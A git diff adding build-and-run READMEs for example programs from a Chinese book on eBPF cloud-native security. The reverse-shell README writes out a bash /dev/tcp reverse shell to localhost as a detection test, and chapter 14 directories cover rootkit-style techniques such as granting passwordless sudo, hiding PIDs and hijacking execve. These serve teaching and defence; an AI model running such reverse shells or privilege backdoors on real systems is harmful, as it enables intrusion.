diff --git a/README.md b/README.md
index 9ed1de0..e1f4316 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,8 @@
 # eBPF 云原生安全：原理与实践
 
 <img src="cover.jpg" height=250 alt="eBPF 云原生安全：原理与实践" />
+![GitHub Actions Workflow Status](https://img.shields.io/github/actions/workflow/status/mozillazg/cloud-native-security-with-ebpf/build.yml?label=build%20programs&link=https%3A%2F%2Fgithub.com%2Fmozillazg%2Fcloud-native-security-with-ebpf%2Factions%2Fworkflows%2Fbuild.yml)
+
 
 
 《eBPF 云原生安全：原理与实践》书中示例程序的完整源代码。
@@ -8,7 +10,7 @@
 
 ## 链接
 
-<!-- * 豆瓣： -->
+* 豆瓣：<https://book.douban.com/subject/37022239/>
 * 天猫：<https://detail.tmall.com/item.htm?id=822518924758>
 * 京东：<https://item.jd.com/10111206687256.html>
 
diff --git a/chapter11/socket-filter-userspace-parse/README.md b/chapter11/socket-filter-userspace-parse/README.md
new file mode 100644
index 0000000..ebad2f5
--- /dev/null
+++ b/chapter11/socket-filter-userspace-parse/README.md
@@ -0,0 +1,20 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
+
+P.S. main.bpf.c 中有类似的 tcp 版本。
+
diff --git a/chapter11/socket-filter/README.md b/chapter11/socket-filter/README.md
new file mode 100644
index 0000000..ebad2f5
--- /dev/null
+++ b/chapter11/socket-filter/README.md
@@ -0,0 +1,20 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
+
+P.S. main.bpf.c 中有类似的 tcp 版本。
+
diff --git a/chapter11/tc-block/README.md b/chapter11/tc-block/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/tc-block/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter11/tc-userspace-parse/README.md b/chapter11/tc-userspace-parse/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/tc-userspace-parse/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter11/tc/README.md b/chapter11/tc/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/tc/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter11/xdp-block/README.md b/chapter11/xdp-block/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/xdp-block/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter11/xdp-userspace-parse/README.md b/chapter11/xdp-userspace-parse/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/xdp-userspace-parse/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter12/net-context/socket-filter/README.md b/chapter12/net-context/socket-filter/README.md
new file mode 100644
index 0000000..b5073ee
--- /dev/null
+++ b/chapter12/net-context/socket-filter/README.md
@@ -0,0 +1,17 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter12/net-context/tc-exist-process/README.md b/chapter12/net-context/tc-exist-process/README.md
new file mode 100644
index 0000000..02f3bb5
--- /dev/null
+++ b/chapter12/net-context/tc-exist-process/README.md
@@ -0,0 +1,21 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+在另一个终端中执行 ``make cat`` 查看输出。
+
+
+在另一个终端中执行 ``curl baidu.com`` 。
+
+
diff --git a/chapter12/net-context/tc/README.md b/chapter12/net-context/tc/README.md
new file mode 100644
index 0000000..02f3bb5
--- /dev/null
+++ b/chapter12/net-context/tc/README.md
@@ -0,0 +1,21 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+在另一个终端中执行 ``make cat`` 查看输出。
+
+
+在另一个终端中执行 ``curl baidu.com`` 。
+
+
diff --git a/chapter12/net-context/xdp/README.md b/chapter12/net-context/xdp/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter12/net-context/xdp/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter12/process-context/README.md b/chapter12/process-context/README.md
new file mode 100644
index 0000000..03985e2
--- /dev/null
+++ b/chapter12/process-context/README.md
@@ -0,0 +1,13 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
diff --git a/chapter13/lsm-bprm_creds_from_file/README.md b/chapter13/lsm-bprm_creds_from_file/README.md
new file mode 100644
index 0000000..d463b83
--- /dev/null
+++ b/chapter13/lsm-bprm_creds_from_file/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中进入 ../memfd-create/ 目录下，按照 README 执行程序。
+
diff --git a/chapter13/memfd-create/README.md b/chapter13/memfd-create/README.md
new file mode 100644
index 0000000..5716f96
--- /dev/null
+++ b/chapter13/memfd-create/README.md
@@ -0,0 +1,12 @@
+
+## 编译
+
+```
+make
+```
+
+## 运行
+
+```
+./memfd-create `which cat` README.md
+```
diff --git a/chapter13/reverse-shell/README.md b/chapter13/reverse-shell/README.md
new file mode 100644
index 0000000..396fbad
--- /dev/null
+++ b/chapter13/reverse-shell/README.md
@@ -0,0 +1,21 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行：
+
+```
+nc -l 8233 &
+bash -i >& /dev/tcp/127.0.0.1/8233 0>&1 &
+```
+
diff --git a/chapter14/add-sudo/README.md b/chapter14/add-sudo/README.md
new file mode 100644
index 0000000..6d738fd
--- /dev/null
+++ b/chapter14/add-sudo/README.md
@@ -0,0 +1,30 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+
+1. 在另一个终端中执行
+
+```
+sudo -u www-data sudo id
+```
+此时会提示需要输入密码。
+
+2. 执行
+
+```
+make run
+```
+
+3. 在另一个终端中再次执行
+
+```
+sudo -u www-data sudo id
+```
+此时不再需要输入密码。
+
diff --git a/chapter14/check-helper-call/README.md b/chapter14/check-helper-call/README.md
new file mode 100644
index 0000000..5f9ee47
--- /dev/null
+++ b/chapter14/check-helper-call/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一个 ebpf 程序，比如执行 ../add-sudo 目录下的程序。
+
+
+在另一个终端中执行一个 ``make cat`` 查看输出。
+
diff --git a/chapter14/execve-hijack/README.md b/chapter14/execve-hijack/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/execve-hijack/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/hide-incoming-traffic/README.md b/chapter14/hide-incoming-traffic/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/hide-incoming-traffic/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/hide-pid/README.md b/chapter14/hide-pid/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/hide-pid/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/hijack-tcp-to-send-data/README.md b/chapter14/hijack-tcp-to-send-data/README.md
index e69de29..aa7f2e4 100644
--- a/chapter14/hijack-tcp-to-send-data/README.md
+++ b/chapter14/hijack-tcp-to-send-data/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/inspect-ebpf-helpers/README.md b/chapter14/inspect-ebpf-helpers/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/inspect-ebpf-helpers/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/modify-incoming-traffic/README.md b/chapter14/modify-incoming-traffic/README.md
index 19aece1..aa7f2e4 100644
--- a/chapter14/modify-incoming-traffic/README.md
+++ b/chapter14/modify-incoming-traffic/README.md
@@ -1,10 +1,16 @@
 
+## 编译
 
-```shell
-
-curl 127.0.0.1:8080/healthz -v --user-agent 'curl/7.81.0 cmd:test________________'
+```
+make build
+```
 
-tcpdump -i lo port 8080 -Xn -s 0
+## 运行
 
-python3 -m http.server --bind 127.0.0.1 8080
 ```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/pipe-hijack/README.md b/chapter14/pipe-hijack/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/pipe-hijack/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/read-file/README.md b/chapter14/read-file/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/read-file/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
